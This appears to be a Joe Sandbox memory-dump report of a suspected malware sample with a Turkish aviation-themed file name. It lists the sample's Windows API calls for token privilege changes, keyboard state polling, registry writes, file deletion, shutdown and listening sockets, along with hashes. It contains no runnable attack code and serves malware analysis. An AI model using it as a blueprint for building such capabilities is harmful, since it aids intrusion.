• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
APIs
  • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
  • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
  • Part of subcall function 00FF87E1: GetLastError.KERNEL32 ref: 00FF8865
• _memset.LIBCMT ref: 00FF8353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FF83A5
• CloseHandle.KERNEL32(?), ref: 00FF83B6
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FF83CD
• GetProcessWindowStation.USER32 ref: 00FF83E6
• SetProcessWindowStation.USER32(00000000), ref: 00FF83F0
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FF840A
  • Part of subcall function 00FF81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FF8309), ref: 00FF81E0
  • Part of subcall function 00FF81CB: CloseHandle.KERNEL32(?,?,00FF8309), ref: 00FF81F2
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0100C78D
• FindClose.KERNEL32(00000000), ref: 0100C7E1
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0100C806
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0100C81D
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0100C844
• __swprintf.LIBCMT ref: 0100C890
• __swprintf.LIBCMT ref: 0100C8D3
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
• __swprintf.LIBCMT ref: 0100C927
  • Part of subcall function 00FC3698: __woutput_l.LIBCMT ref: 00FC36F1
• __swprintf.LIBCMT ref: 0100C975
  • Part of subcall function 00FC3698: __flsbuf.LIBCMT ref: 00FC3713
  • Part of subcall function 00FC3698: __flsbuf.LIBCMT ref: 00FC372B
• __swprintf.LIBCMT ref: 0100C9C4
• __swprintf.LIBCMT ref: 0100CA13
• __swprintf.LIBCMT ref: 0100CA62
Similarity
• API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
• String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
APIs
• FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0100EFB6
• _wcscmp.LIBCMT ref: 0100EFCB
• _wcscmp.LIBCMT ref: 0100EFE2
• GetFileAttributesW.KERNEL32(?), ref: 0100EFF4
• SetFileAttributesW.KERNEL32(?,?), ref: 0100F00E
• FindNextFileW.KERNEL32(00000000,?), ref: 0100F026
• FindClose.KERNEL32(00000000), ref: 0100F031
• FindFirstFileW.KERNEL32(*.*,?), ref: 0100F04D
• _wcscmp.LIBCMT ref: 0100F074
• _wcscmp.LIBCMT ref: 0100F08B
• SetCurrentDirectoryW.KERNEL32(?), ref: 0100F09D
• SetCurrentDirectoryW.KERNEL32(01058920), ref: 0100F0BB
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0100F0C5
• FindClose.KERNEL32(00000000), ref: 0100F0D2
• FindClose.KERNEL32(00000000), ref: 0100F0E4
Similarity
• API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01020953
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0102F910,00000000,?,00000000,?,?), ref: 010209C1
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 01020A09
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 01020A92
• RegCloseKey.ADVAPI32(?), ref: 01020DB2
• RegCloseKey.ADVAPI32(00000000), ref: 01020DBF
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
APIs
• FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 0100F113
• _wcscmp.LIBCMT ref: 0100F128
• _wcscmp.LIBCMT ref: 0100F13F
  • Part of subcall function 01004385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 010043A0
• FindNextFileW.KERNEL32(00000000,?), ref: 0100F16E
• FindClose.KERNEL32(00000000), ref: 0100F179
• FindFirstFileW.KERNEL32(*.*,?), ref: 0100F195
• _wcscmp.LIBCMT ref: 0100F1BC
• _wcscmp.LIBCMT ref: 0100F1D3
• SetCurrentDirectoryW.KERNEL32(?), ref: 0100F1E5
• SetCurrentDirectoryW.KERNEL32(01058920), ref: 0100F203
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0100F20D
• FindClose.KERNEL32(00000000), ref: 0100F21A
• FindClose.KERNEL32(00000000), ref: 0100F22C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 1824444939-438819550
                                                                                                                                    • Opcode ID: e0b9251d9f21f244c75fed19720a8574cedd44898b61f5f71d77ac7f219a1c35
                                                                                                                                    • Instruction ID: 7b7b9736f43d731fca2f758f3501b8a941cc16de2233ef878a82ae24404b9cc1
                                                                                                                                    • Opcode Fuzzy Hash: e0b9251d9f21f244c75fed19720a8574cedd44898b61f5f71d77ac7f219a1c35
                                                                                                                                    • Instruction Fuzzy Hash: 9731483650021B7BEB32EEA8EC49EDE77BC9F462A0F144199E980E20D0DB35DA44DB54
                                                                                                                                    APIs
                                                                                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0100A20F
                                                                                                                                    • __swprintf.LIBCMT ref: 0100A231
                                                                                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0100A26E
                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0100A293
                                                                                                                                    • _memset.LIBCMT ref: 0100A2B2
                                                                                                                                    • _wcsncpy.LIBCMT ref: 0100A2EE
                                                                                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0100A323
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0100A32E
                                                                                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0100A337
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0100A341
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                    • String ID: :$\$\??\%s
                                                                                                                                    • API String ID: 2733774712-3457252023
                                                                                                                                    • Opcode ID: bd371c39ec16f3082b3b2e8187dcc58826f531a071f37454338fa6020e241760
                                                                                                                                    • Instruction ID: a460a54c674edf53c5b236379cd806aa9e01ea84f83c734dd5732a822f50802e
                                                                                                                                    • Opcode Fuzzy Hash: bd371c39ec16f3082b3b2e8187dcc58826f531a071f37454338fa6020e241760
                                                                                                                                    • Instruction Fuzzy Hash: B831C37160020AABEB31DFA4DC49FEB37BCEF89740F1041B6FA49D2190EB7592448B24
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FF8202: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FF821E
                                                                                                                                      • Part of subcall function 00FF8202: GetLastError.KERNEL32(?,00FF7CE2,?,?,?), ref: 00FF8228
                                                                                                                                      • Part of subcall function 00FF8202: GetProcessHeap.KERNEL32(00000008,?,?,00FF7CE2,?,?,?), ref: 00FF8237
                                                                                                                                      • Part of subcall function 00FF8202: HeapAlloc.KERNEL32(00000000,?,00FF7CE2,?,?,?), ref: 00FF823E
                                                                                                                                      • Part of subcall function 00FF8202: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FF8255
                                                                                                                                      • Part of subcall function 00FF829F: GetProcessHeap.KERNEL32(00000008,00FF7CF8,00000000,00000000,?,00FF7CF8,?), ref: 00FF82AB
                                                                                                                                      • Part of subcall function 00FF829F: HeapAlloc.KERNEL32(00000000,?,00FF7CF8,?), ref: 00FF82B2
                                                                                                                                      • Part of subcall function 00FF829F: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00FF7CF8,?), ref: 00FF82C3
                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00FF7D13
                                                                                                                                    • _memset.LIBCMT ref: 00FF7D28
                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00FF7D47
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FF7D58
                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00FF7D95
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00FF7DB1
                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00FF7DCE
                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00FF7DDD
                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00FF7DE4
                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00FF7E05
                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00FF7E0C
                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00FF7E3D
                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00FF7E63
                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00FF7E77
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3996160137-0
                                                                                                                                    • Opcode ID: 50a047ec84e28b4e85e25dc986db6943bc918944afb45f9e2b4415b08e0bde73
                                                                                                                                    • Instruction ID: e9045246318ae1338ff3d92b9ca423175f03e772de8ace82c5bcbbcd2d0e7f5a
                                                                                                                                    • Opcode Fuzzy Hash: 50a047ec84e28b4e85e25dc986db6943bc918944afb45f9e2b4415b08e0bde73
                                                                                                                                    • Instruction Fuzzy Hash: A6615C7190020AAFDF209FA0DC85EBEFB79FF04750F14815AFA15A6290DB399A05DB60
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                                                                                                    • API String ID: 0-4052911093
                                                                                                                                    • Opcode ID: aa3c1376444f65c066839e952ec9ca4e0f394484d103e2930eeb6f3b775765b0
                                                                                                                                    • Instruction ID: e3e9a64ca60cba25b6267887289849cc1f2cc6d6f501cae8058147f86573a48c
                                                                                                                                    • Opcode Fuzzy Hash: aa3c1376444f65c066839e952ec9ca4e0f394484d103e2930eeb6f3b775765b0
                                                                                                                                    • Instruction Fuzzy Hash: A2724DB5E00219DBDB24CF59C8807FEB7B5BF44720F24816AE949EB290DB349941EF90
                                                                                                                                    APIs
                                                                                                                                    • GetKeyboardState.USER32(?), ref: 01000097
                                                                                                                                    • SetKeyboardState.USER32(?), ref: 01000102
                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 01000122
                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 01000139
                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 01000168
                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 01000179
                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 010001A5
                                                                                                                                    • GetKeyState.USER32(00000011), ref: 010001B3
                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 010001DC
                                                                                                                                    • GetKeyState.USER32(00000012), ref: 010001EA
                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 01000213
                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 01000221
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                    • Opcode ID: d6be4d8be4fb27b002b83c80ae8b1999ee5dbdefaafed7b5d50eaab9ab44a1eb
                                                                                                                                    • Instruction ID: cfdbd3c827603eb776450619f179da07343ff48784ec00488a3b590b1397e314
                                                                                                                                    • Opcode Fuzzy Hash: d6be4d8be4fb27b002b83c80ae8b1999ee5dbdefaafed7b5d50eaab9ab44a1eb
                                                                                                                                    • Instruction Fuzzy Hash: 9351F83090478929FB77DBA888147EABFF49F022C0F0845DEE6C6565C7DAA4978CC761
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 01020E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0101FDAD,?,?), ref: 01020E31
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010204AC
                                                                                                                                      • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                                                                                      • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0102054B
                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 010205E3
                                                                                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 01020822
                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0102082F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1240663315-0
APIs
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
  • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
• FindFirstFileW.KERNEL32(?,?), ref: 010038A3
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 0100394B
• MoveFileW.KERNEL32(?,?), ref: 0100395E
• DeleteFileW.KERNEL32(?,?,?,?,?), ref: 0100397B
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0100399D
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 010039B9
Strings
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• API String ID: 4002782344-1173974218
APIs
  • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
• FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0100F440
• Sleep.KERNEL32(0000000A), ref: 0100F470
• _wcscmp.LIBCMT ref: 0100F484
• _wcscmp.LIBCMT ref: 0100F49F
• FindNextFileW.KERNEL32(?,?), ref: 0100F53D
• FindClose.KERNEL32(00000000), ref: 0100F553
Strings
Similarity
• API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
• String ID: *.*
• API String ID: 713712311-438819550
APIs
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
APIs
  • Part of subcall function 00FA4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA4743,?,?,00FA37AE,?), ref: 00FA4770
  • Part of subcall function 01004A31: GetFileAttributesW.KERNEL32(?,0100370B), ref: 01004A32
• FindFirstFileW.KERNEL32(?,?), ref: 01003B89
• DeleteFileW.KERNEL32(?,?,?,?), ref: 01003BD9
• FindNextFileW.KERNEL32(00000000,00000010), ref: 01003BEA
• FindClose.KERNEL32(00000000), ref: 01003C01
• FindClose.KERNEL32(00000000), ref: 01003C0A
Strings
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
APIs
  • Part of subcall function 00FF87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
  • Part of subcall function 00FF87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
  • Part of subcall function 00FF87E1: GetLastError.KERNEL32 ref: 00FF8865
• ExitWindowsEx.USER32(?,00000000), ref: 010051F9
Strings
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• API String ID: 2234035333-194228
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 010162DC
• WSAGetLastError.WSOCK32(00000000), ref: 010162EB
• bind.WSOCK32(00000000,?,00000010), ref: 01016307
• listen.WSOCK32(00000000,00000005), ref: 01016316
• WSAGetLastError.WSOCK32(00000000), ref: 01016330
• closesocket.WSOCK32(00000000,00000000), ref: 01016344
Similarity
• API ID: ErrorLast$bindclosesocketlistensocket
• String ID:
• API String ID: 1279440585-0
                                                                                                                                    • Opcode ID: 1e48c39b159af124dd0fb8d02c1c6ec22c39770a09622a6cfe901af3dbb8dc44
                                                                                                                                    • Instruction ID: 70f6fdb9a06190fe1b5f68eb3902889e250f3f3c3f5fe2230ff9cb83d3bdf0c1
                                                                                                                                    • Opcode Fuzzy Hash: 1e48c39b159af124dd0fb8d02c1c6ec22c39770a09622a6cfe901af3dbb8dc44
                                                                                                                                    • Instruction Fuzzy Hash: 8B21F2702002059FCB20EF68CC45A6EB7F8EF45320F248258E996E7395CBB9AD01DB61
APIs
  • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
  • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
• _memmove.LIBCMT ref: 00FF0258
• _memmove.LIBCMT ref: 00FF036D
• _memmove.LIBCMT ref: 00FF0414
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: _memmove$Exception@8Throwstd::exception::exception
• String ID:
• API String ID: 1300846289-0
• Opcode ID: 9af1663907bcefa3c62fb1ba9ef476fb9ed17caf92761ca013614789982cc0bb
• Instruction ID: fdd47070f93ac904e1c825d2fc1e02fba07c7ae59848f0192ec23648cbcc4d57
• Opcode Fuzzy Hash: 9af1663907bcefa3c62fb1ba9ef476fb9ed17caf92761ca013614789982cc0bb
• Instruction Fuzzy Hash: 3402D0B1E00209DBCF04DF65D982ABEBBB5EF44310F148069E90ADB255EF39D911EB91
APIs
  • Part of subcall function 00FA2612: GetWindowLongW.USER32(?,000000EB), ref: 00FA2623
• DefDlgProcW.USER32(?,?,?,?,?), ref: 00FA19FA
• GetSysColor.USER32(0000000F), ref: 00FA1A4E
• SetBkColor.GDI32(?,00000000), ref: 00FA1A61
  • Part of subcall function 00FA1290: DefDlgProcW.USER32(?,00000020,?), ref: 00FA12D8
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ColorProc$LongWindow
• String ID:
• API String ID: 3744519093-0
• Opcode ID: 070a6ceef8ad15ababdf7021e55c1766a8c71c112a15eb5c7a23b1fec9b611ff
• Instruction ID: c3e663edd78890bb2f64e6557a88e02d1af836faf53754892dbc950fbb91915e
• Opcode Fuzzy Hash: 070a6ceef8ad15ababdf7021e55c1766a8c71c112a15eb5c7a23b1fec9b611ff
• Instruction Fuzzy Hash: EDA139F2506596FAE638AE288C54EBF355DFF473A1F1B010AF542D6291CA2D8D01F272
APIs
  • Part of subcall function 01017D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 01017DB6
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0101679E
• WSAGetLastError.WSOCK32(00000000), ref: 010167C7
• bind.WSOCK32(00000000,?,00000010), ref: 01016800
• WSAGetLastError.WSOCK32(00000000), ref: 0101680D
• closesocket.WSOCK32(00000000,00000000), ref: 01016821
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: c1bbb96f209f7b54e0e0f32b50e00ca9fdc7a440d641fe31455b71114a610f01
• Instruction ID: 6cfb7f1789635b535ada9dd10bad53bc1e129618d9b8584ed97c0d503905c283
• Opcode Fuzzy Hash: c1bbb96f209f7b54e0e0f32b50e00ca9fdc7a440d641fe31455b71114a610f01
• Instruction Fuzzy Hash: D141C2B5A00210AFDB20BF248C86F6E77E8AF06754F44856CF955AB3C2DABC9D019791
APIs
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
